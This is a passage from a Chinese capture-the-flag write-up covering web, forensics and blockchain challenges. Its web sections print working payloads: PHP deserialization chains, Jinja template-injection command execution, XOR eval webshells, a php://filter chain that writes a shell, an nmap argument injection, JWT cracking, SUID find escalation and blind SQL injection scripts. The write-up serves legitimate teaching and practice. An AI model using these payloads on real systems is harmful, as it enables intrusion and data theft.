'%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2';//$a->qwe->asd->power->QW = urldecode($d);$b = new SplStack();$b->push($a);echo urlencode(serialize($b));?>
分析源码,决定从Me类入手,这里使用SPL类进行绕过,经过测试发现,php7.3是可以执行成功的,而php7.4无法序列化出C开头的链子
$a = new Me();$b = new SplStack();$b->push($a);echo urlencode(serialize($b));
这里给secret赋值随机数,使用引用绕过
$a = new Me();$a->bro = &$a->secret;$b = new SplStack();$b->push($a);echo urlencode(serialize($b));
return $bb();这里触发invoke
$a = new Me();$a->bro = &$a->secret;$a->qwe = new her();$b = new SplStack();$b->push($a);echo urlencode(serialize($b));
然后这里的序列化触发了sleep
$a = new Me();$a->bro = &$a->secret;$a->qwe = new her();$a->qwe->asd = new important();$b = new SplStack();$b->push($a);echo urlencode(serialize($b));
sleep这里我是改成了construct,否则无法生成序列化串
$a = new Me();$a->bro = &$a->secret;$a->qwe = new her();$a->qwe->asd = new important();$c='%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2';$a->qwe->asd->power->YXX = urldecode($c);$d = '%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2';$a->qwe->asd->power = new useless($args);$a->qwe->asd->power->QW = urldecode($d);$b = new SplStack();$b->push($a);echo urlencode(serialize($b));
在这里md5强碰撞,然后HTTP部分使用content-type进行绕过
最终得到一堆key
/**/
将两边的注释符去掉就可以转化为图片Base64在线转换图片_图片转Base64_在线base64图片转换工具_yzc工具网
然后得到下图
key是9hername是momo
然后就可以去干find那个方法了
$a = new Me();$a->bro = &$a->secret;$a->qwe = new her();$a->qwe->asd = new important();$args2 = array(new her,'find');$args = array('seeyou'=>$args2);$a->qwe->asd->power = new useless($args);$b = new SplStack();$b->push($a);echo urlencode(serialize($b));
生成链子就可以打到find那个方法去了,记得在类里给hername还有key赋值
file_get_content使用data协议进行绕过
file=data://text/plain,loveyou
然后原生类读文件,这里写了个脚本寻思在根目录游走一番,结果啥也没有
import requestsimport timeurl = 'https://d3hffahokhgq0qw5g9bglxoy5.node.game.sycsec.com/havefun.php?user=C%3A8%3A%22SplStack%22%3A356%3A%7Bi%3A6%3B%3AO%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A3%3A%22asd%22%3BN%3Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bs%3A1%3A%229%22%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BN%3Bs%3A3%3A%22YXX%22%3BN%3B%7D%7Ds%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bs%3A1%3A%229%22%3B%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A18%3B%7D%7D&file=data://text/plain,loveyou&fun=glob:///*'#fun=glob:///*str = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'for i in str:time.sleep(0.2)payload = url + 'm' + '*'headers = {'Host': 'd3hffahokhgq0qw5g9bglxoy5.node.game.sycsec.com','Content-Length': '21','Cache-Control': 'max-age=0','Sec-Ch-Ua': '"Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"','Sec-Ch-Ua-Mobile': '?0','Sec-Ch-Ua-Platform': '"Windows"','Upgrade-Insecure-Requests': '1','Origin': 'https://d3hffahokhgq0qw5g9bglxoy5.node.game.sycsec.com','Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','Sec-Fetch-Site': 'same-origin','Sec-Fetch-Mode': 'navigate','Sec-Fetch-User': '?1','Sec-Fetch-Dest': 'document','Referer': payload,'Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9','Sec-Fetch-Site': 'cross-site','Sec-Fetch-Mode': 'navigate','Sec-Fetch-Dest': 'document'}data={'ctf':'DirectoryIterator'}r = requests.post(url,data,headers)te = r.text.split('!<br>')[3]print(te)
最后在html目录下找到flag
使用原生类读取flag名,访问得到flag
scan_tool
参考:
BUUCTF 2018 Online Tool-CSDN博客^v88^control_2,239^v2^insert_chatgpt&utm_term=%5BBUUCTF%202018%5DOnline%20Tool&spm=1018.2226.3001.4187
一些不包含数字和字母的webshell | 离别歌
这两个博客
利用escapeshellarg函数处理命令会剔除不可见字符的特性可以使用不可见字符对过滤的option进行绕过,payload如下
利用-iL参数将文件外带,利用-oG参数将结果写入当前目录的文件
%27+-i%faL+%2Fflag+-o%faN+1.txt+%27
klf_2
考点:字符串拼接,全角绕过
{% set po=dict(po=a,p=b)|join%} //拼接pop {% set a=(()|select|string|list)|attr(po)(24)%} //利用pop获取()|select|string|list列表中的_{%set ini=(a,a,dict(in=a,it=b)|join,a,a)|join()%} //拼接__init__{%set glo=(a,a,dict(glo=a,bals=b)|join,a,a)|join()%} //拼接__globals__{%set cls=(a,a,dict(cla=a,ss=b)|join,a,a)|join()%} //拼接__class__{%set bs=(a,a,dict(bas=a,e=b)|join,a,a)|join()%} //拼接base{%set geti=(a,a,dict(get=a)|join,dict(item=a)|join,a,a)|join()%} //拼接getitem,用来绕过[]{%set subc=(a,a,dict(subcla=a,sses=b)|join,a,a)|join()%} //拼接__subclasses__{%set pp=dict(po=a,p=b,en=c)|join%} //拼接popen{%set re=dict(re=a,ad=b)|join%} //拼接read{%set cc=dict(c=a,h=b,r=c)|join%} //拼接字符chr{% set bui=(a,a,dict(buil=a,tins=b)|join,a,a)|join() %} //拼接__builtins__{%set ch=()|attr(cls)|attr(bs)|attr(subc)()|attr(geti) //利用os类提取函数chr,用于字符串拼接(117)|attr(ini)|attr(glo)|attr(geti)(bui)|attr(geti)(cc)%}{%set ppp=()|attr(cls)|attr(bs)|attr(subc)()|attr(geti) //使用os类,拼接出popen函数(117)|attr(ini)|attr(glo)|attr(geti)(pp)%} {%set cmd=(ch(108),ch(115))|join()%} //利用chr拼接出系统命令{{ppp(cmd)|attr(re)()}} //进行命令执行
利用chr函数绕过命令的过滤,利用join函数将命令进行拼接,上传全角的时候记得url编码,全角字符如下
0,1,2,3,4,5,6,7,8,9
任何字符其实都可以使用非ascii码表字符进行绕过,脚本如下
for i in range(128,65537):tmp=chr(i)try:res = tmp.encode('idna').decode('utf-8')if("-") in res:continueprint("U:{} A:{} ascii:{} ".format(tmp, res, i))except:pass
EzRce
参考博客:
源码如下
<?phpinclude('waf.php');session_start();show_source(__FILE__);error_reporting(0);$data=$_GET['data'];if(waf($data)){eval($data);}else{echo "no!";}?>
通过highlight_file读取waf.php,结果如下
function waf($data){ if(preg_match('/[b-df-km-uw-z0-9\+\~\{\}]+/i',$data)){return False;}else{return True;}}
字母中没有过滤eval,利用p神的脚本进行命令执行
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;eval($___[_]);
POST
file_put_contents('1.php','<?=eval($_POST["chu0"]);?>');
写shell连接蚁剑,读取flag发现没有权限,find提权获取flag
find / -perm -4000 2>/dev/nullfind /tmp -exec cat /flag \;
ezpython
简单的python原型链污染。
直接在注册的时候将身份变成vip,利用unicode编码绕过isvip检测。
然后直接利用数字全角绕过数字检测得到flag。
change_it
源码拿到账号密码,登陆后说没有上传权限,应该是要伪造cookie,测试后是jwt,密钥爆破
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJRaW5nd2FuIiwibmFtZSI6InVzZXIiLCJhZG1pbiI6ImZhbHNlIn0.gzCFCz2Hw5c_EIjcM2lQ2QL3aDW3rAAHU2ZQ50_tnY4Secret is "yibao"
jwt伪造admin权限,发现上传并没有限制,上传php文件成功,查看源码获得如下信息
function php_mt_seed($seed){mt_srand($seed);}$seed = time();php_mt_seed($seed);$characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';$newFileName = '';for ($i = 0; $i < 10; $i++) {$newFileName .= $characters[mt_rand(0, strlen($characters) - 1)];}
伪随机,密钥一样结果就一样,本地测试,文件名也是一样的,接下来就是对time进行爆破,这里是取了上下五十,写了两个脚本
import requestsimport timeimport osurl = 'https://senc7zrbyu7vzbzgqrduxpw38.node.game.sycsec.com/'file = {'avatar':('chu3.php','<?=eval($_POST["chu0"]);?>','application/octet-stream')}url1 = url + 'change.php'headers = {'Cookie':'token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJhZG1pbiIsIm5hbWUiOiJhZG1pbiIsImFkbWluIjoidHJ1ZSJ9.8nV1QCrKddruGHmqK69U69k6IQVUIzOvr69qB8qis1k'}r1 = requests.post(url=url1,files=file,headers=headers)print(r1.text)time = int(time.time())with open('./1.txt','w') as f:for i in range(time-50,time+50):f.write(str(i)+'\n')os.system('php test.php')with open('./2.txt','r') as f2:for line in f2:data = line.strip()payload = url+ 'upload/' + data + '.php'print(payload)r = requests.get(payload)if r.status_code==200:print(data)break
<?php$filename = '1.txt';$file = fopen($filename,'r');$file2 = fopen('./2.txt','w');while (!feof($file)) {$line = fgets($file);mt_srand($line);$characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';$newFileName = '';for ($i = 0; $i < 10; $i++) {$newFileName .= $characters[mt_rand(0, strlen($characters) - 1)];}fwrite($file2,$newFileName."\n");}
python先上传文件,获取时间戳,将上下50的时间结果写入文件,然后用php读取时间戳并生成对应的文件名写入文件,最后再用python读取文件名并发送请求对文件名进行爆破,爆出文件名后连接蚁剑在根目录获取flag
ezrfi
查看源码获得提示读取hint.py,经过从此尝试得到hint在
../../hint
读取后得到如下内容
w5YubyBvd08gMHcwIG92MCDDlndvIE8ubyAwLjAgMC5vIMOWdjAgMHbDliBPdjAgT3fDliBvLk8gw5Z2TyAwXzAgMF9PIG8uTyAwdjAgw5ZfbyBPd28gw5Z2TyDDli5PIMOWXzAgTy5PIMOWXzAgMHbDliAwLjAgw5Z2w5Ygw5Z3MCBPdsOWIMOWdjAgT1/DliDDlnZPIMOWLk8gw5Z3MCBvd8OWIMOWLm8gTy5vIMOWXzAgMHbDliDDlndvIE93w5YgTy5vIE93TyBvX28gw5YuTyBvLm8gb3dPIMOWXzAgb3dPIMOWXzAgMHZvIG8uTyBPd8OWIE92byAwLsOWIMOWdjAgTy7DliAwLjAgMHfDliBvLsOWIG93byBvdzAgMHZvIMOWLm8gb3dPIG9fMCDDli5PIG9fbyBPd8OWIE8ubyBvdzAgw5ZfbyBvd28gw5YuMCDDlnZPIG9fTyBPLsOWIE92MCBPdzAgby7DliAwdjAgT3YwIE9fTyBvLk8gT3bDliDDlnYwIMOWXzAgw5Z3byBvd08gT19vIE93w5Ygby5PIMOWdk8gby4wIDBfMCDDll9vIG93TyBPXzAgMC7DliDDli5vIE8uTyBPdzAgT19vIMOWdjAgb3cwIMOWdjAgT18wIMOWdm8gw5Z2w5Ygw5ZfbyAwX8OWIMOWdm8gw5Z2w5YgMHcwIE92w5Ygw5YubyDDli4wIMOWLm8gb3ZvIMOWLjAgw5YuMCAwd28gb3dPIG8uTyAwd8OWIDB2MCBvd8OWIMOWdzAgw5YubyAwdzAgT1/DliBvX08gw5Z2byAg
base64 尊嘟假嘟 rc4,这里rc4的key是猜的,题目描述的Syclover,最终结果如下
文件包含逻辑是include($file.".py"),你能找到flag文件位置吗??
想到题目中是有hint.py,然后直接测信道写入文件并包含
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.GBK.UTF-8|convert.iconv.IEC_P27-1.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=../../hint
写入内容如下
<?php eval($_GET[1]);?>a
get 1命令执行在根目录下拿到flag
Akane!
glob://协议爆破文件名,访问就出flag
import requestsimport base64import timeurl = 'http://svdpakfo21v04snw2pb7fk9p6.node.game.sycsec.com/?tuizi='str1 = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_.!@#$%^&()-+=/`~?*'len1 = 24name = ''for j in range(1,100):for i in str1:time.sleep(1)payload1 = '''O:7:"Hoshino":2:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:'''+str(len1)+''':"glob:///var/www/html/T'''+name+i+'''*";}s:19:"HoshinoAquamarine";N;'''pay1 = base64.b64encode(payload1.encode('utf-8'))payload = url + pay1.decode('utf-8')r = requests.get(payload)print(payload1)if 'Kurokawa Akane' in r.text:name+=ilen1+=1print(name)break
TheS4crEtF1AgFi1EByo2takuXX.php
klf_3
上一次的payload直接拿来用
{% set po=dict(po=a,p=b)|join%} //拼接pop {% set a=(()|select|string|list)|attr(po)(24)%} //利用pop获取()|select|string|list列表中的_{%set ini=(a,a,dict(in=a,it=b)|join,a,a)|join()%} //拼接__init__{%set glo=(a,a,dict(glo=a,bals=b)|join,a,a)|join()%} //拼接__globals__{%set cls=(a,a,dict(cla=a,ss=b)|join,a,a)|join()%} //拼接__class__{%set bs=(a,a,dict(bas=a,e=b)|join,a,a)|join()%} //拼接base{%set geti=(a,a,dict(get=a)|join,dict(item=a)|join,a,a)|join()%} //拼接getitem,用来绕过[]{%set subc=(a,a,dict(subcla=a,sses=b)|join,a,a)|join()%} //拼接__subclasses__{%set pp=dict(po=a,p=b,en=c)|join%} //拼接popen{%set re=dict(re=a,ad=b)|join%} //拼接read{%set cc=dict(c=a,h=b,r=c)|join%} //拼接字符chr{% set bui=(a,a,dict(buil=a,tins=b)|join,a,a)|join() %} //拼接__builtins__{%set ch=()|attr(cls)|attr(bs)|attr(subc)()|attr(geti) //利用os类提取函数chr,用于字符串拼接(117)|attr(ini)|attr(glo)|attr(geti)(bui)|attr(geti)(cc)%}{%set ppp=()|attr(cls)|attr(bs)|attr(subc)()|attr(geti) //使用os类,拼接出popen函数(117)|attr(ini)|attr(glo)|attr(geti)(pp)%} {%set cmd=(ch(108),ch(115))|join()%} //利用chr拼接出系统命令{{ppp(cmd)|attr(re)()}} //进行命令执行
ez_sql
先判断闭合
1')#
fuzz一下
主要是过滤了information这个字段,使用sys库的表获取库名表名,先注入一下数据库名
import requestsurl = 'http://47.108.56.168:1111/index.php'str1 = 'abcdefghigklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-+_'mid=''for i in range(0,100):for j in str1:payload = '''1\')/**/and/**/(schema())/**/like/**/binary/**/\''''+mid+j+'''%\'#'''data = {'id':payload}r = requests.post(url=url,data=data)if 'Success requires' in r.text:mid+=jprint(mid)break#articles
最后还是得用sys去获取库表名
import requestsurl = 'http://47.108.56.168:1112/index.php'str1 = 'abcdefghigklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$^&*()-+%'mid=''flag=0for k in range(0,5):for i in range(0,15):if '%' in mid:mid = ''breakfor j in str1:if '%' in mid:mid=''break#payload = '''1\')/**/and/**/(select/**/table_schema/**/from/**/sys.schema_table_statistics/**/limit/**/'''+str(k)+''',1)/**/like/**/\''''+mid+j+'''%\'#'''#payload = '''1\')/**/and/**/(select/**/column_name/**/from/**/sys.schema_table_statistics/**/limit/**/'''+str(k)+''',1)/**/like/**/\''''+mid+j+'''%\'#'''payload = '''1\')/**/and/**/(select/**/*/**/from/**/ctf.flll444aaggg9/**/limit/**/'''+str(k)+''',1)/**/like/**/\''''+mid+j+'''%\'#'''print(payload)data = {'id':payload}r = requests.post(url=url,data=data)if 'Success requires' in r.text:mid+=jprint(mid)break
MISC
下一站是哪呢
分离图片。
网上找个表,得到iwanttobaijiucity
搜索一下是泸州,看一下 8月25的航班
得到 SYC{CZ8579_Luzhou}
窃听风云
HTML加密的流量包
看https://zhuanlan.zhihu.com/p/52882041
看有NTLMv2散列的.pcap文件。 通过ntlmssp这一字符串进行数据包筛选,获得身份验证的握手包。
得到三个包。查找NTLMSSP_AUTH包。过滤到 Security Blob层,就可以得到
复制一下domain和name。深入查找NTLM响应部分,找到NTProofStr字段和NTLMv2的响应。复制十六进制字符串到文本文档中。
将以上的值复制成以下:
然后利用hashcat 对字典进行爆破得到iamjackspassword
SYC{iamjackspassword}
extractMe
crc爆破,四个四个的来。
ez_smilemo
载附件后,得到一个exe文件和一个data.win文件,题目提示通关游戏即可得到flag,先去网上搜索一下data.win文件怎么打开
、
可以看到利用undertalemodtool软件可以打开,用这个软件打开data.win文件,并搜索flag
|
可以看到一段base64数据,base64解密后,包上SYC{}即为flag
Flag为 SYC{sm1le_1s_@_n1ce_g@me}
DEATH_N0TE
打开附件,是一张图片,先用zsteg跑出其中的LSB数据
base64解码后,得到一半的flag
剩下一半,通过观察图片,发现图片中有一些黑色和白色的小点,通过降低图片的大小,使得这些小点更加清晰,脚本如下:
from PIL import Imageim = Image.open('1.png')pix = im.load()width = im.size[0]height = im.size[1]# 新图像的宽度和高度(每12个像素生成一个新像素)new_width = width // 5new_height = height // 5# 创建一个新的图像对象new_img = Image.new("RGB", (new_width, new_height))for x in range(0,width,5):for y in range(0,height,5):rgb=pix[x, y]new_img.putpixel((x//5,y//5),(int(rgb[0]),int(rgb[1]),int(rgb[2])))new_img.save('new_image.png')
经过对照后,得到一段base64数据:TkFNRV9vMnRha3VYWH0=
|
解码后拼在一起即为flag
Flag为SYC{D4@Th_N0t4_NAME_o2takuXX}
Qingwan心都要碎了
通过搜索磁器口,可定位旅游地点在重庆
再搜索一下重庆著名博物馆,即可找到flag
Flag为SYC{中国三峡博物馆}
xqr
打开附件是一个二维码,直接扫描会得到一个假flag,用010打开,发现里面还藏着一张png图片
提取出来,发现还是一张类似二维码图片
两张图片的像素大小不一样,无法异或,所以先用脚本把提取出来的图片大小放大,脚本如下:
from PIL import Image# 打开原始图像im = Image.open('2.png')pix = im.load()width = im.size[0]height = im.size[1]# 新图像的宽度和高度(每个像素扩大为一个 3x3 块)new_width = width * 3new_height = height * 3# 创建一个新的图像对象new_img = Image.new("RGB", (new_width, new_height))# 将每个像素复制到新图像中的一个 3x3 块for x in range(width):for y in range(height):rgb = pix[x, y]for i in range(3):for j in range(3):new_img.putpixel((x * 3 + i, y * 3 + j), (int(rgb[0]), int(rgb[1]), int(rgb[2])))# 保存新图像new_img.save('enlarged_image.png')
再将两张图片异或,扫码即为flag
Flag为SYC{hOp3_u_h@ve_Fun}
DEATH_N1TE
打开附件,是一段音频和一张gif图片,音频的后半部分有很明显的SSTV隐写,利用手机上的robot36软件将声音转图片获得前半部分的flag
gif图片有880张,把gif图片转成880张图片保存到文件夹中
利用imagemagick把这800多张图片合并在一起
利用gaps自动拼图软件,把图片基本复原
得到一段base64数据XzE0X0tpMTE0Un0=,解密把两段拼在一起即为flag
Flag为SYC{H4xr0t0r_14_Ki114R}
give_me_Goerlieth
这个题目吗要求在Goerlieth测试连上进行,但我没有Goerlieth币啊,咋办,怎么做
考虑到题目上让交Transaction Hash在区块连浏览器上是公开的,只需要在区块链浏览器上交别人的就可以了
0x8c358e8e9e834d52a37a0cb66f7f4cf4194f2dfc2f57b074b63ac4bc387bc1f10x8c358e8e9e834d52a37a0cb66f7f4cf4194f2dfc2f57b074b63ac4bc387bc1f1
SimpleConnect
去区块链浏览器搜地址,直接用上一个的合约地址
0x663A6e994d0197273c3D578D220571020545bFD3
DEATH-N2TE
提取视频中可疑的像素点
import cv2import numpy as npdef extract_pixels(video_path, threshold, start_col, col_interval, output_image_path):cap = cv2.VideoCapture(video_path)frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))frame_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))extracted_image = np.zeros((frame_height, min(frame_count, frame_width), 3), dtype=np.uint8)current_col = start_colfor frame_idx in range(frame_count):ret, frame = cap.read()if not ret:breakif current_col < frame_width:col_to_scan = frame[:, current_col, :]white_pixels = np.all(col_to_scan >= threshold, axis=-1)extracted_image[white_pixels, frame_idx, :] = col_to_scan[white_pixels]current_col += col_intervalif current_col >= frame_width:current_col = start_col # Reset to start if we exceed the widthcap.release()cv2.imwrite(output_image_path, extracted_image)cv2.imshow('Extracted Image', extracted_image)cv2.waitKey(0)cv2.destroyAllWindows()video_path = './kira.mp4'threshold = np.array([200, 200, 200])start_col = 5col_interval = 10output_image_path = 'extracted_image.png'extract_pixels(video_path, threshold, start_col, col_interval, output_image_path)
提取出来有些不清楚,可以放到文档里拉伸一下,得到flag
stage
pragma solidity ^0.8.4;interface IReceiver {function getNumber() external view returns(uint256);}contract stageGame{mapping (address => bool) private flag;mapping (address => bool) public isStage1Completed;function stage1() external {uint size;address addr = msg.sender;assembly { size := extcodesize(addr) }require(size == 0,"EOA must!");isStage1Completed[msg.sender] = true;}function stage2(uint _guess) external {require(isStage1Completed[msg.sender],"You should complete stage1 first!");uint number = block.timestamp % 100 + 1;require(number == _guess, "Wrong number!");_stage3();}function _stage3() private {uint size;address addr = msg.sender;assembly { size := extcodesize(addr) }require(size > 0,"Contract must!");uint256 number1;uint256 number2;(bool success,bytes memory data1) = addr.staticcall(abi.encodeWithSignature("getNumber()"));require(success,"First call failed!");number1 = abi.decode(data1, (uint256));(bool success2,bytes memory data2) = addr.call(abi.encodeWithSignature("getNumber()"));require(success2,"Second call failed!");number2 = abi.decode(data2, (uint256));require(number1 != number2, "Must return different Number!");flag[tx.origin] = true;}function check(address addr) external view returns(bool){return flag[addr];}}
合约中总共有3关
第一关,size为0即可绕过
第二关,猜数,直接套他源码就行
uint number = block.timestamp % 100 + 1;
第三关的话,他需要检查地址
pragma solidity ^0.8.4;interface IReceiver {function getNumber() external view returns(uint256);}contract stageGame{mapping (address => bool) private flag;mapping (address => bool) public isStage1Completed;function stage1() external {uint size;address addr = msg.sender;assembly { size := extcodesize(addr) }require(size == 0,"EOA must!");isStage1Completed[msg.sender] = true;}function stage2(uint _guess) external {require(isStage1Completed[msg.sender],"You should complete stage1 first!");uint number = block.timestamp % 100 + 1;require(number == _guess, "Wrong number!");_stage3();}function _stage3() private {uint size;address addr = msg.sender;assembly { size := extcodesize(addr) }require(size > 0,"Contract must!");uint256 number1;uint256 number2;(bool success,bytes memory data1) = addr.staticcall(abi.encodeWithSignature("getNumber()"));require(success,"First call failed!");number1 = abi.decode(data1, (uint256));(bool success2,bytes memory data2) = addr.call(abi.encodeWithSignature("getNumber()"));require(success2,"Second call failed!");number2 = abi.decode(data2, (uint256));require(number1 != number2, "Must return different Number!");flag[tx.origin] = true;}function check(address addr) external view returns(bool){return 